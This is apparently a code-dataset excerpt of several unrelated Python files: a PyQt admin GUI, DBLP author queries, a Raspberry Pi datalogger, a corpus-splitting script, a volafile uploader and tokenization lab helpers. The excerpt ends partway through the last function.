            ms.showCMessageBox("Usuario Eliminao!!!! FOREVA!")
class Client(QMainWindow):
    """Menu window for user administration (list / add / edit / delete)."""
    def __init__(self):
        QMainWindow.__init__(self)
        layout = QHBoxLayout()
        # Removed an unused QTextEdit ('lineEdit') that was created here but
        # never added to any layout or referenced again.
        button = QPushButton("Ver lista de Usuarios")
        button2 = QPushButton("Agregar Usuario Nuevo")
        button3 = QPushButton("Editar Usuarios")
        button4 = QPushButton("Eliminar Usuarios")
        layout.addWidget(button)
        layout.addWidget(button2)
        layout.addWidget(button3)
        layout.addWidget(button4)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Aministrador de usuarios")
        self.connect(button, SIGNAL('clicked()'), self.listau)
        self.connect(button2, SIGNAL('clicked()'), self.agregaru)
        self.connect(button3, SIGNAL('clicked()'), self.editaru)
        self.connect(button4, SIGNAL('clicked()'), self.eliminaru)
    def listau(self):
        # Keep a reference on self so the child window is not garbage-collected.
        self.mylistu = listau()
        self.mylistu.show()
    def agregaru(self):
        self.myaddu = agregaru()
        self.myaddu.show()
    def editaru(self):
        self.myeditu = editaru()
        self.myeditu.show()
    def eliminaru(self):
        self.mydeletu = eliminaru()
        self.mydeletu.show()
################Usuarios de ^ ##############################
##############Todo lo de la main windown V abajo############
class MainWindow(QMainWindow):
    """Top-level menu: users, articles, categories and sales administration."""
    def __init__(self):
        QMainWindow.__init__(self)
        layout = QVBoxLayout()
        button = QPushButton("Administrar Usuarios")
        button2 = QPushButton("Administrar Articulos")
        button3 = QPushButton("Administrar Categorias")
        button4 = QPushButton("Administrar Ventas")
        layout.addWidget(button)
        layout.addWidget(button2)
        layout.addWidget(button3)
        layout.addWidget(button4)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Servidor")
        self.connect(button, SIGNAL('clicked()'), self.newWindow)
        self.connect(button2, SIGNAL('clicked()'), self.newWindow2)
        self.connect(button3, SIGNAL('clicked()'), self.newWindow3)
        self.connect(button4, SIGNAL('clicked()'), self.newWindow4)
    def newWindow(self):
        # Keep a reference on self so the child window is not garbage-collected.
        self.myClient = Client()
        self.myClient.show()
    def newWindow2(self):
        self.misArticulos = articulos()
        self.misArticulos.show()
    def newWindow3(self):
        self.myCats = Categorias()
        self.myCats.show()
    def newWindow4(self):
        self.myvent = ventas()
        self.myvent.show()
############# de aca para ^ main windown y abajo el Main func##########
if __name__ == "__main__":
    # Build the Qt application, show the top-level menu and run the event loop.
    app = QApplication(sys.argv)
    mainWindow = MainWindow()
    mainWindow.setGeometry(200, 200, 200, 200)
    mainWindow.show()
    sys.exit(app.exec_()) #Funcion Main :)
|
997,765 | f19a7895ee072fb8a0b33d3106908455925fd375 | from sqlalchemy import *
from sqlalchemy.orm import *
from tables import *
engine = create_engine("postgresql://cavuser:cavuser@localhost:5432/cav_dblp")
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
def get_name(author_id):
    # NOTE(review): returns the whole first result ROW (a 1-tuple), not the
    # bare name string; callers print it as-is. Raises IndexError when the
    # id does not exist -- TODO confirm both are intended.
    return engine.execute(text("SELECT name FROM authors WHERE id=:id;"), id=author_id).fetchall()[0]
import operator
def coauthors_within_5y_span():
    """For each sliding 5-year window 1989..2014, print the three authors with
    the largest number of distinct coauthor ids (DISTINCT ON author_id over
    publications in the window; the count includes the author themself)."""
    print "Number of coauthors within 5 year span"
    for l in range(1989, 2010):
        print l, "to", (l+5)
        co_authors_in_range = dict()
        for author in session.query(Author):
            # I'm sure there is a much better way to do this using SQL and SQL Alchemy
            co_authors_in_range[author.id] = len(engine.execute(text("""
            SELECT DISTINCT ON (limited_to_author.author_id)
                pub.year, limited_to_author.author_id, limited_to_author.publication_id
            FROM publications pub
            INNER JOIN (
                SELECT pa.publication_id, pa.author_id
                FROM publication_authors pa
                WHERE pa.publication_id IN (
                    (SELECT publication_id
                    FROM publication_authors
                    WHERE author_id=:id)
                )) limited_to_author
            ON pub.id=limited_to_author.publication_id
            WHERE year>=:lower AND year<:upper;
            """), id = author.id, lower=l, upper=(l+5)).fetchall())
        # Top 3 by count, descending.
        m = sorted(co_authors_in_range.iteritems(), key=operator.itemgetter(1))[-3:]
        m.reverse()
        for i in range(3):
            print (i+1), ")", get_name(m[i][0]), "with", m[i][1]
def publications_within_5y_span():
    """For each sliding 5-year window 1989..2014, print the three authors with
    the most publications (rows of publication_authors joined to publications
    in the window)."""
    print "Number of publications within 5 year span"
    for l in range(1989, 2010):
        print l, "to", (l+5)
        publications_in_range = dict()
        for author in session.query(Author):
            # I'm sure there is a much better way to do this using SQL and SQL Alchemy
            publications_in_range[author.id] = len(engine.execute(text("""
            SELECT
                pub.year, limited_to_author.author_id, limited_to_author.publication_id
            FROM publications pub
            INNER JOIN (
                (SELECT author_id, publication_id
                FROM publication_authors
                WHERE author_id=:id)
            ) limited_to_author
            ON pub.id=limited_to_author.publication_id
            WHERE year>=:lower AND year<:upper;
            """), id = author.id, lower=l, upper=(l+5)).fetchall())
        # Top 3 by count, descending.
        m = sorted(publications_in_range.iteritems(), key=operator.itemgetter(1))[-3:]
        m.reverse()
        for i in range(3):
            print (i+1), ")", get_name(m[i][0]), "with", m[i][1]
def single_author_papers():
    """Print the three authors with the most single-author publications
    (publication_authors groups having exactly one author)."""
    print "Single author papers"
    publications = dict()
    for author in session.query(Author):
        # I'm sure there is a much better way to do this using SQL and SQL Alchemy
        publications[author.id] = len(engine.execute(text("""
        SELECT pub.author_id, pub.publication_id
        FROM publication_authors pub
        INNER JOIN (
            SELECT publication_id
            FROM publication_authors
            GROUP BY publication_id
            HAVING COUNT(author_id) = 1
        ) single_author_papers
        ON pub.publication_id = single_author_papers.publication_id
        WHERE author_id=:id;
        """), id = author.id).fetchall())
    # Top 3 by count, descending.
    m = sorted(publications.iteritems(), key=operator.itemgetter(1))[-3:]
    m.reverse()
    for i in range(3):
        print (i+1), ")", get_name(m[i][0]), "with", m[i][1]
# Run the three reports, separated by blank lines.
single_author_papers()
print ""
coauthors_within_5y_span()
print ""
publications_within_5y_span()
|
997,766 | b4d78da93511493fd9fe69cda1d089997ae16c7e |
from django.contrib.auth import get_backends, authenticate
|
997,767 | 87b206eab89ff6f4f464721bea7f8f8f2dcbb326 | # -*- coding: utf-8 -*-
import socket
import os, sys
from module_declarations import PL1012DataFormat, PL1012BYTE_N, SAMPLING_BASE_TIME, SCREEN_POS, BYTE_N, CWD_PATH
from module_declarations import SKT_PATH, SKT_PL1000, SKT_TC08, HW_SN_EN, TC08DataFormat, TC08FLOAT_N, PEAKDataFormat
from module_declarations import PC_OFFLINE, RPI_DEVELOPMENT, RPI_PRODUCTION
import time
import datetime
import xml.etree.ElementTree
import csv
import threading
# Class for thread running a blinking of PowerStatus LED
class BlinkPowerLed (threading.Thread):
    """Thread that blinks the power-status LED at 2 Hz while the module-level
    flag ``power_latch`` is truthy; exits when it goes False."""
    def __init__(self, thread_id, name, counter):
        threading.Thread.__init__(self)
        self.threadID = thread_id
        self.name = name
        self.counter = counter
    def run(self):
        print("Starting " + self.name)
        # power_latch is a module-level flag toggled by the shutdown sequence.
        while power_latch:
            set_power_led(LED_OFF)
            time.sleep(0.25)
            set_power_led(LED_ON)
            time.sleep(0.25)
        print("Exiting " + self.name)
# Class for thread running a blinking of PowerStatus LED
class BlinkLoggingLed (threading.Thread):
    """Thread that blinks the logging-status LED at 1 Hz while the module-level
    flag ``logging_led_status`` is truthy."""
    def __init__(self, thread_id, name, counter):
        threading.Thread.__init__(self)
        self.threadID = thread_id
        self.name = name
        self.counter = counter
    def run(self):
        print("Starting " + self.name)
        # logging_led_status is a module-level flag set by the main loop.
        while logging_led_status:
            set_logging_led(LED_OFF)
            time.sleep(0.5)
            set_logging_led(LED_ON)
            time.sleep(0.5)
        print("Exiting " + self.name)
# Function for printing in Screen Matrix the displayed values
#
def print_xy(x, y, contents=None, color=None):
sys.stdout.write("\x1b7\x1b[%d;%df%s\x1b8" % (x, y, contents))
sys.stdout.flush()
# Function for detecting the Key status from RPI GPIO
# The key status is connected to Raspberry GPIO 3
def key_status():
    # Reads the key-switch input (BCM pin 3); returns the raw GPIO level.
    key_status_detected = GPIO.input(3)
    return key_status_detected
# Function for setting the power status indicator LED mode
# The power status indicator LED is connected to Raspberry GPIO 9
def set_power_led(status):
    # status is a GPIO level (LED_ON / LED_OFF).
    GPIO.output(9,status)
# Function for setting the logging status indicator LED mode
# The logging status indicator LED is connected to Raspberry GPIO 7
def set_logging_led(status):
    # Returns the level that was written, so callers can keep the last state.
    GPIO.output(7,status)
    return status
# Function for setting the power latch enable mode
# The power latch enable is connected to Raspberry GPIO 5
def set_power_latch(status):
    # Returns the level that was written, so callers can keep the last state.
    GPIO.output(5,status)
    return status
# Function for linearising a raw signal sample before writing records to the CSV file
def linearise_signal(raw_value,parameters):
    """Convert a raw sample into engineering units.

    *parameters* is one channel dict from channel_config.xml; its 'hw' key
    selects the conversion:
      - 'pl1012': raw_value is numeric -> raw * slope + offset
      - 'pcan':   raw_value is a byte sequence; 8- and 16-bit little-endian
                  payloads (bit_offset 0) are scaled by 'resolution' and
                  shifted by 'offset'
    Returns None (after logging the problem) for unsupported widths or
    unconvertible payloads, and None for any other 'hw' value.
    """
    linearized_value = None
    if parameters['hw'] == "pl1012":
        linearized_value = raw_value*float(parameters['slope'])+float(parameters['offset'])
    if parameters['hw'] == "pcan":
        resolution = float(parameters['resolution'])
        offset = float(parameters['offset'])
        if int(parameters['bits']) == 8 and int(parameters['bit_offset']) == 0:
            try:
                linearized_value = float(raw_value[0])*resolution+offset
            # BUG FIX: was a bare 'except:', which also swallowed
            # KeyboardInterrupt/SystemExit. Catch only conversion errors.
            except (TypeError, ValueError, IndexError):
                print("\n8 bits raw_value not convertible ='{}'".format(raw_value))
                print("for parameter ='{}'\n".format(parameters))
                linearized_value= None
        elif int(parameters['bits']) == 16 and int(parameters['bit_offset']) == 0:
            try:
                # Little-endian: byte 0 is the LSB, byte 1 the MSB.
                lsbyte = float(raw_value[0])
                msbyte = float(raw_value[1])
                raw_value_int = lsbyte+msbyte*2**8
                linearized_value = float(raw_value_int)*resolution+offset
            except (TypeError, ValueError, IndexError):
                print("\n16 bits raw_value not convertible ='{}'".format(raw_value))
                print("for parameter ='{}'\n".format(parameters))
                linearized_value= None
        else:
            #TODO CAN linearisation for data lengths of less than 8 bits
            print("\nno 8 and no 16 bits raw_value not convertible ='{}'".format(raw_value))
            print("for parameter ='{}'\n".format(parameters))
            linearized_value = None
    return linearized_value
# Send a text command over an already-connected socket.
def send_command(socket_client=None,command=None):
    """Encode *command* as UTF-8 and send it on *socket_client*."""
    socket_client.send(command.encode('utf-8'))
# Select the runtime environment. Timing defaults are the same in both
# branches; only the GPIO implementation differs (RPiSim simulator offline).
environment = PC_OFFLINE
if environment == PC_OFFLINE:
    bt = SAMPLING_BASE_TIME.total_seconds()
    sleep_time = bt
    lag_correction = 0.0
    full_connect= False
    from RPiSim.GPIO import GPIO
elif environment == RPI_PRODUCTION:
    # NOTE(review): this branch sets the same values but imports no GPIO
    # module -- on real hardware the GPIO name below would be undefined.
    # TODO confirm where the production GPIO import is supposed to happen.
    bt = SAMPLING_BASE_TIME.total_seconds()
    sleep_time = bt
    lag_correction = 0.0
    full_connect = False
GPIO.setmode(GPIO.BCM)
KEY_ON = True
KEY_OFF = False
LED_ON = GPIO.HIGH
LED_OFF = GPIO.LOW
GPIO.setup(3, GPIO.IN, initial=GPIO.HIGH, pull_up_down=GPIO.PUD_UP) # this is the key sense input
GPIO.setup(5, GPIO.OUT, initial=GPIO.HIGH, pull_up_down=GPIO.PUD_DOWN) # this the power latch enable output
logging_led_status = GPIO.LOW
GPIO.setup(7, GPIO.OUT, initial=logging_led_status, pull_up_down=GPIO.PUD_DOWN) # this is the Datalogging running blinking led
GPIO.setup(9,GPIO.OUT, initial=GPIO.LOW, pull_up_down=GPIO.PUD_DOWN) # this is the power state led output
# Latch the power on only if the key switch is ON; otherwise exit immediately.
if key_status() == KEY_ON:
    set_power_led(GPIO.HIGH)
    power_latch = set_power_latch(GPIO.HIGH)
else:
    set_power_led(GPIO.LOW)
    sys.exit(2)
#TODO develop the LED blinking and fixed
#TODO develop the power latch management
# calculates required connections total number
total_connection_req_conf = 0
for item in iter(HW_SN_EN):
    print(item)
    if HW_SN_EN[item]["en"]:
        total_connection_req_conf += 1
print("Connecting... looking for {} devices.".format(total_connection_req_conf))
time_conn_begin = datetime.datetime.now()
total_connection_req_det = 0
# Create clients for the three sockets
# Create PL1012 socket client
if HW_SN_EN["PL1000"]["en"]:
    try:
        # Starting C modules streaming sockets
        # Starting PL1000
        if os.path.exists(os.path.join(SKT_PATH,HW_SN_EN["PL1000"]["socket_file"])):
            client_PL1012 = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            client_PL1012.connect(os.path.join(SKT_PATH,HW_SN_EN["PL1000"]["socket_file"]))
            answ = client_PL1012.recv(20)
            # Count the device as detected only after a successful handshake.
            total_connection_req_det += 1
        else:
            answ = "socket file {} not found".format(os.path.join(SKT_PATH,HW_SN_EN["PL1000"]["socket_file"]))
    except Exception as e:
        print("something's wrong. Exception is %s" % (e))
        answ = "None"
    finally:
        print("Answer from server PL1012 socket: {}".format(answ))
        print("Ready.")
#        print("Ctrl-C to quit.")
#        print("Sending 'DONE' shuts down the server and quits.")
# Create TC08 socket client
if HW_SN_EN["TC08"]["en"]:
    try:
        if os.path.exists(os.path.join(SKT_PATH, HW_SN_EN["TC08"]["socket_file"])):
            client_TC08 = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            client_TC08.connect(os.path.join(SKT_PATH, HW_SN_EN["TC08"]["socket_file"]))
            answ = client_TC08.recv(20)
            total_connection_req_det += 1
        else:
            # BUG FIX: this message previously formatted the PL1000 socket
            # path instead of the TC08 one.
            answ = "socket file {} not found".format(os.path.join(SKT_PATH,HW_SN_EN["TC08"]["socket_file"]))
    except Exception as e:
        # BUG FIX: the old handler referenced undefined names 'address' and
        # 'port', raising a NameError that masked the original exception.
        print("something's wrong. Exception is %s" % (e))
        answ = "None"
    finally:
        print("Answer from server TC08 socket: {}".format(answ))
        print("Ready.")
        print("Ctrl-C to quit.")
        print("Sending 'DONE' shuts down the server and quits.")
# Create PCAN socket client
if HW_SN_EN["PEAK"]["en"]:
    try:
        if os.path.exists(os.path.join(SKT_PATH, HW_SN_EN["PEAK"]["socket_file"])):
            client_PEAK = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            client_PEAK.connect(os.path.join(SKT_PATH, HW_SN_EN["PEAK"]["socket_file"]))
            answ = client_PEAK.recv(20)
            total_connection_req_det += 1
        else:
            # BUG FIX: this message previously formatted the PL1000 socket
            # path instead of the PEAK one.
            answ = "socket file {} not found".format(os.path.join(SKT_PATH, HW_SN_EN["PEAK"]["socket_file"]))
    except Exception as e:
        print("something's wrong with opening PEAK. Exception is %s " % (e))
        answ = "None"
    finally:
        print("Answer from server PEAK socket: {}".format(answ))
        print("Ready.")
        print("Ctrl-C to quit.")
        print("Sending 'DONE' shuts down the server and quits.")
# Clear the terminal, then abort unless every enabled device connected.
_=os.system("clear")
sys.stdout.flush()
if total_connection_req_det != total_connection_req_conf:
    sys.exit(1)
# Parsing channels configuration from xml file
# BEGIN
tree = xml.etree.ElementTree.parse(os.path.join(CWD_PATH, 'conf/channel_config.xml'))
root = tree.getroot()
channels_dict = dict()
# data_row[0] is reserved for the timestamp; one extra slot is appended per channel.
data_row = [None]
for type in root:
    print(type.tag, '<-- child.tag | child.attrib --->', type.attrib)
    if type.tag == 'DatalogFilenamePrefix':
        FILENAME_PREFIX = type.attrib['prefix']
    for ch in type.iter('ch'):
        # Channels are keyed by their CSV column index ('col' attribute).
        channels_dict[ch.attrib['col']] = ch.attrib
        data_row.append(None)
        print(type.attrib['type'], ' --> Analog input channels --> ', ch.attrib)
del root, tree, type, ch
# END OF CHANNELS CONFIG PARSER
#TODO write the csv writer for file container of data
# Open a timestamped CSV output file in CWD_PATH.
file_name_suffix = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
file_name = FILENAME_PREFIX+file_name_suffix+'.csv'
csv_file_name = os.path.join(CWD_PATH,file_name)
csv_file_header= open(csv_file_name,mode='w', encoding='utf-8')
csv_file = csv.writer(csv_file_header, dialect='excel', delimiter=',', quotechar="'", quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
del file_name, file_name_suffix, FILENAME_PREFIX
# write the file table columns header
head_row = list(' '*(len(channels_dict)+1))
# add first column as timestamp in position 0 (zero)
head_row[0]='Timestamp(Unix) [s from 1.1.1970]'
for col, channel in channels_dict.items():
    col_head = "{} [{}]".format(channel['name'],channel['um'])
    head_row[int(col)]=col_head
csv_file.writerow(head_row)
# NOTE(review): this del raises NameError if channels_dict is empty
# (col_head never bound) -- TODO confirm config always has channels.
del head_row, col_head
# MAIN LOOP OF DATA LOGGING
first_cycle = True
#check the staus of the Key input - if KEY_OFF jump to program exit
while key_status() == KEY_ON:
    try:
        #for cycle in range(cycles):
        if first_cycle:
            # First pass: start the logging-LED blinker thread, prime the
            # timing accumulators and kick off the first acquisition on the
            # PL1012 and TC08 servers. Their replies are read on the NEXT pass.
            # Create new threads
            thread2 = BlinkLoggingLed(2, "Blink-LogLed", 1)
            logging_led_status = True
            # Start new Threads
            thread2.start()
            t_old = datetime.datetime.now()
            iet = datetime.timedelta(0)
            et_mean=datetime.timedelta(0)
            send_command(client_PL1012, 'K')
            answ = ""
            send_command(client_TC08, 'S')
            answ_tc08 = ""
            cycle = 1
            first_cycle=False
        else:
            # Collect the replies for the commands sent on the previous pass.
            answ = client_PL1012.recv(24)
            answ_tc08 = client_TC08.recv(256)
        # PEAK (CAN) is polled synchronously: command then reply as CSV text.
        send_command(client_PEAK, 'S')
        answPEAK = client_PEAK.recv(2048)
        CAN_row_Data = []
        CAN_row_Data_parser = csv.reader(answPEAK.decode().split('\n'), delimiter=',')
        for value in CAN_row_Data_parser:
            CAN_row_Data.append(value)
            print('\t'.join(value))
        # Binary payloads decoded with the construct-style formats from
        # module_declarations.
        temperatures_data = TC08DataFormat.parse(answ_tc08)
        pl1012_data = PL1012DataFormat.parse(answ)
        # for i in range(TC08FLOAT_N):
        #
        #
        # for i in range(PL1012BYTE_N):
        #     print_xy(SCREEN_POS[i][0], SCREEN_POS[i][1] + 12, "{:06d}".format(data.data[i]))
        # for i in range(PL1012BYTE_N, PL1012BYTE_N + TC08FLOAT_N):
        #     print_xy(SCREEN_POS[i][0], SCREEN_POS[i][1] + 12,
        #              "{:04.3f}".format(temperatures.data[i - PL1012BYTE_N]))
        #
        # start_time_data = PL1012BYTE_N + TC08FLOAT_N + 1
        # # print_xy(SCREEN_POS[start_time_data][0], SCREEN_POS[start_time_data][1]+12, "{}".format(i))
        # print_xy(SCREEN_POS[start_time_data + 1][0], SCREEN_POS[start_time_data + 1][1] + 12,
        #          "cycle {}/{}".format(cycle, cycles))
        # print_xy(SCREEN_POS[start_time_data + 2][0], SCREEN_POS[start_time_data + 2][1] + 12,
        #          "Mean {:09.6f}".format(et_mean.total_seconds()))
        # print_xy(SCREEN_POS[start_time_data + 3][0], SCREEN_POS[start_time_data + 3][1] + 12,
        #          "Min {:09.6f}".format(et_min.total_seconds()))
        # print_xy(SCREEN_POS[start_time_data + 4][0], SCREEN_POS[start_time_data + 4][1] + 12,
        #          "Max {:09.6f}".format(et_max.total_seconds()))
        # print_xy(SCREEN_POS[start_time_data + 5][0], SCREEN_POS[start_time_data + 5][1] + 12,
        #          "Lag corr {:09.6f}".format(lag_correction))
        # Running mean of the cycle time; a tenth of each cycle's lag is fed
        # back into the sleep time to keep the average period near bt.
        cycle +=1
        t_now = datetime.datetime.now()
        et = t_now -t_old
        iet += et
        et_mean= iet/cycle
        #print("SENT {} on iteration {}: et_mean={}, et_max= {} et_min= {}".format(x, i, et_mean.total_seconds(),et_max.total_seconds(), et_min.total_seconds()))
        t_old=t_now
        lag_time = et.total_seconds()-bt
        lag_correction += lag_time/10
        sleep_time = bt - lag_correction
        # print_xy(SCREEN_POS[start_time_data+6][0], SCREEN_POS[start_time_data+6][1]+12, "Sleep time{}".format(sleep_time))
        # Kick off the next PL1012/TC08 acquisition before processing this one.
        send_command(client_PL1012,'K')
        send_command(client_TC08,'S')
        # Loop for data linearization according to channel_config.xml
        for col, channel in channels_dict.items():
            if channel['hw']=='tc08':
                # TC08 return float value already linearized
                data_row[int(col)] = temperatures_data.data[int(channel['ph'])]
            elif channel['hw']=='pl1012':
                data_row[int(col)] = linearise_signal(pl1012_data.data[int(channel['ph'])],channel)
            elif channel['hw']=='pcan':
                # Match the configured PGN against every received CAN frame id.
                for msg in CAN_row_Data:
                    if len(msg) > 1:
                        msg_id = msg[0]
                        if channel['pgn'] in msg_id.upper():
                            data_len = int((float(channel['bits'])+7)/8)
                            data_row[int(col)] = linearise_signal(msg[int(channel['byte']):int(channel['byte'])+data_len],channel)
            else:
                # Unknown hardware type: leave the column empty.
                data_row[int(col)] = None
        # write the data row in csv file
        # insert timestamp
        data_row[0] = datetime.datetime.now(datetime.timezone.utc).timestamp()
        csv_file.writerow(data_row)
        if sleep_time < 0.0:
            sleep_time = bt
        time.sleep(sleep_time)
    except KeyboardInterrupt as k:
        print("\nClient Shutting down.\n")
        client_PL1012.close()
        client_TC08.close()
        client_PEAK.close()
        break
# send closing command and close all clients
print("\nClient Shutting down.\n")
logging_led_status = False
time.sleep(2)
# Create new threads
thread1 = BlinkPowerLed(1, "Thread-1", 1)
# Start new Threads
thread1.start()
print ("Exiting Main Thread")
send_command(client_PL1012, 'X')
client_PL1012.close()
send_command(client_TC08, 'X')
client_TC08.close()
send_command(client_PEAK, 'X')
client_PEAK.close()
GPIO.cleanup()
csv_file_header.close()
power_latch = False
thread1.join()
time.sleep(5)
set_power_latch(GPIO.LOW)
sys.exit(0)
|
997,768 | acd1df17e2b0964f54e8701640dce4bf02c227b8 | import sys
import os
import argparse
argparser = argparse.ArgumentParser('''
Builds Brent dataset into appropriate format for use with DNN-Seg.
''')
argparser.add_argument('dir_path', help='Path to Brent source directory')
argparser.add_argument('-o', '--outdir', default='../dnnseg_data/brent/', help='')
args = argparser.parse_args()

# Create the output tree; exist_ok avoids the check-then-create race and the
# train/test subdirs implicitly create the parent outdir as well.
os.makedirs(os.path.join(args.outdir, 'train'), exist_ok=True)
os.makedirs(os.path.join(args.outdir, 'test'), exist_ok=True)

# Split the phonemic transcription: raw line index < 8000 -> train, rest -> test.
# Blank lines are dropped but still count toward the 8000-line cutoff, matching
# the original behaviour. Iterating the file directly avoids loading it whole.
with open(os.path.join(args.dir_path, 'br-phono.txt'), 'r') as f, \
        open(os.path.join(args.outdir, 'train', 'br-phono.txt'), 'w') as train, \
        open(os.path.join(args.outdir, 'test', 'br-phono.txt'), 'w') as test:
    for i, l in enumerate(f):
        if l.strip():
            (train if i < 8000 else test).write(l)
997,769 | 99aabb664017dc2b3e78571d5c7213b80df50307 | from volapi import Room
import argparse
import config
import os
import requests
def upload_process(room, passwd, user, userpasswd, files):
    """Upload the given files/folders to a volafile room.

    room: room name; passwd: room password or '#key...'-prefixed room key;
    user/userpasswd: override config.VOLAFILE_USER / _USER_PASSWORD;
    files: list of file/folder paths (may be None when -f was omitted).
    Returns False on fatal errors, None after attempting the uploads.
    """
    # argparse leaves files as None when -f was not given, so guard against
    # None as well as the empty list (len(None) would raise TypeError).
    if not files:
        print("[X] No files were recognised! - Aborting upload")
        return False
    if room == "":
        print("[X] You must provide a room! - Aborting upload!")
        return False
    # Resolve credentials: CLI args override config, config overrides the
    # anonymous default user "volapi". upw_set marks whether a login follows.
    if user == "" and config.VOLAFILE_USER == "":
        local_user = "volapi"
        upw_set = False
    elif user == "" and config.VOLAFILE_USER != "":
        local_user = config.VOLAFILE_USER
        if config.VOLAFILE_USER_PASSWORD != "":
            local_password = config.VOLAFILE_USER_PASSWORD
            upw_set = True
        else:
            upw_set = False
    else:
        local_user = user
        if userpasswd != "":
            local_password = userpasswd
            upw_set = True
        else:
            upw_set = False
    rpw_set = passwd != ""
    try:
        # A password starting with "#key" is treated as a room key instead.
        if rpw_set and passwd[0:4] == "#key":
            local_room = Room(name=room, key=passwd[4:], user=local_user)
        elif rpw_set:
            local_room = Room(name=room, password=passwd, user=local_user)
        else:
            local_room = Room(name=room, user=local_user)
    except RuntimeError:
        print(
            f"[X] Could not connect to the specified room: {room} - Aborting upload.")
        return False
    if upw_set:
        try:
            local_room.user.login(local_password)
        except RuntimeError:
            print(
                f"[X] Could not login user: {local_user} with the provided password - Aborting upload."
            )
            local_room.close()  # don't leak the open room connection
            return False
    filenum = 0
    for f in files:
        if os.path.isfile(f):
            filenum += 1
            handle_file(f, local_room, filenum)
        elif os.path.isdir(f):
            # Upload the direct children only; nested folders are skipped.
            for filename in os.listdir(f):
                if os.path.isfile(os.path.join(f, filename)):
                    filenum += 1
                    handle_file(os.path.join(f, filename), local_room, filenum)
                else:
                    print(
                        f"[X] Subfolders are not handled, please specify seperately: {f} - Continue to next specified file"
                    )
        else:
            print(
                f"[X] File/Folder could not be recognised: {f} - Continue to next specified file/folder"
            )
    local_room.close()
def handle_file(file, room, filenum):
    """Upload a single file to *room* and report the resulting URL.

    file: path of the file to upload; filenum: 1-based counter for output.
    Upload errors are reported but never raised to the caller.
    """
    callback = CallbackInfo(file.split("/")[-1], filenum, room)
    # Initialise file_id so the check below is safe when an exception is
    # raised (previously this path crashed with NameError).
    file_id = None
    try:
        file_id = room.upload_file(file, callback=callback, allow_timeout=True)
    except ValueError:
        print(
            f"[{filenum}] Uploading to {room.name} | ERROR: File was too big to upload!",
            end="\r",
        )
    except (requests.exceptions.ConnectionError, ConnectionError):
        # requests' ConnectionError and the builtin are distinct types; both
        # previously printed the same message in separate clauses.
        print(
            f"[{filenum}] Uploading to {room.name} | ERROR: Connection timed out!",
            end="\r",
        )
    if file_id:
        print("")
        print(
            f"[{filenum}] {file.split('/')[-1]} uploaded to https://volafile.org/get/{file_id}/"
        )
    else:
        print("")
class CallbackInfo:
    """Progress reporter handed to Room.upload_file.

    Stores the display name, the running file number and the room name, and
    prints a carriage-return-updated progress line each time it is called.
    """

    def __init__(self, name, num, room):
        # Keep only the room's name; the Room object itself is not needed.
        self.room = room.name
        self.name = name
        self.num = num

    def __call__(self, current, total):
        # Single line, rewritten in place via the trailing carriage return.
        print(
            f"[{self.num}] Uploading to {self.room} | {self.name} -> {current / (1024 * 1024.0):.2f}MB/{total / (1024 * 1024.0):.2f}MB -> {float(current) / total:.2%} completed!",
            end="\r",
        )
def parse_args():
    """Build the CLI parser for the volafile uploader and parse sys.argv."""
    parser = argparse.ArgumentParser(description="volafile uploader")
    parser.add_argument("--room", "-r", dest="room", type=str, required=True,
                        help="Room name, as in https://volafile.org/r/ROOMNAME")
    parser.add_argument("--passwd", "-p", dest="passwd", type=str, default="",
                        help="Room password to enter the room")
    parser.add_argument("--user", "-u", dest="user", type=str, default="",
                        help="Overwrite for VOLAFILE_USER in config.py")
    parser.add_argument("--userpasswd", "-up", dest="userpasswd", type=str, default="",
                        help="Overwrite for VOLAFILE_USER_PASSWORD in config.py")
    parser.add_argument("-f", "--files", metavar="FILE", type=str, nargs="+",
                        help="Files/folders to upload")
    return parser.parse_args()
def main():
    """Entry point: parse the CLI arguments and run the upload process."""
    cli = parse_args()
    upload_process(cli.room, cli.passwd, cli.user, cli.userpasswd, cli.files)
# Run the uploader only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
|
997,770 | 6632e5c001ef557b19e1e5585ef78101f707c531 | import builtins
import difflib
import inspect
import os
# Hack that modifies the built-in `open` function so that the assignment
# can also be run at places other than the server: files that are missing
# from the given path are looked up next to this module instead.
def find_filename(filename):
    """Resolve *filename*: return it unchanged if it exists, otherwise look
    for a file of the same base name next to this module. Falls back to the
    original name when neither location exists.
    """
    if os.path.exists(filename):
        return filename
    module_dir = os.path.dirname(inspect.getfile(inspect.currentframe()))
    candidate = os.path.join(module_dir, os.path.basename(filename))
    return candidate if os.path.exists(candidate) else filename
# Keep a reference to the real built-in open so new_open can delegate to it.
old_open = builtins.open
def new_open(filename, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None):
    # Same signature as io.open; only the filename is rewritten through
    # find_filename before delegating to the original built-in.
    return old_open(find_filename(filename), mode, buffering, encoding, errors, newline, closefd, opener)
# Monkey-patch: every subsequent open() call in this process now resolves
# missing paths relative to this module first. Order matters: old_open must
# be captured before this assignment.
builtins.open = new_open
# Lab code proper
def _diff(gold_tokens, pred_tokens):
"""Iterator over pairs describing longest differing subsequences
within `gold_tokens` and `pred_tokens`.
"""
matcher = difflib.SequenceMatcher(None, gold_tokens, pred_tokens)
a_lo = b_lo = 0
for a_hi, b_hi, n in matcher.get_matching_blocks():
if a_lo < a_hi or b_lo < b_hi:
yield gold_tokens[a_lo:a_hi], pred_tokens[b_lo:b_hi]
a_lo = a_hi + n
b_lo = b_hi + n
def diff(gold_tokens, pred_tokens):
    """Materialise the differing-stretch pairs of `gold_tokens` versus
    `pred_tokens` (see `_diff`) into a list.
    """
    differing_runs = _diff(gold_tokens, pred_tokens)
    return list(differing_runs)
def _n_matches(gold_tokens, pred_tokens):
"""Return the number of elements that match within `gold_tokens` and
`pred_tokens`.
"""
matcher = difflib.SequenceMatcher(None, gold_tokens, pred_tokens)
return sum(match.size for match in matcher.get_matching_blocks())
def n_errors(gold_tokens, pred_tokens):
    """Count tokenization errors in `pred_tokens` against `gold_tokens`:
    every unmatched gold token plus every unmatched predicted token.
    """
    matched = _n_matches(gold_tokens, pred_tokens)
